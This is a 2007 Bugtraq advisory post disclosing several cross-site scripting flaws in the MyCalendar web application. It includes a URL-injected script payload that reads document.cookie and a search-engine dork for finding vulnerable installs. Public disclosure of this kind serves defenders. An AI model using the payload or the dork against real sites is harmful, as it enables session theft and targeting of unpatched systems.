Bugtraq mailing list archives

MyCalendar multiple XSS


From: sn0oPy.team () gmail com
Date: 19 Feb 2007 22:13:09 -0000

* MyCalendar multiple XSS

* By : sn0oPy

* Risk : medium

* site : http://abledesign.com/programs/MyCalendar/
 

* exploit :

     XSS on the search menu : http://www.target.ma/calendar/index.php?go=search
     XSS on the url : http://www.target.ma/calendar/index.php?go=";><script>alert(document.cookie)</script>
     XSS on the username and password at http://www.target.ma/crown/cal/index.php?go=Login

* dork : intitle:"myCalendar"


* contact : sn0oPy () avenir-geopolitique net

* Site : http://forums.avenir-geopolitique.net

* greetz : [subzero], Avg Team.

* Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2686


Current thread: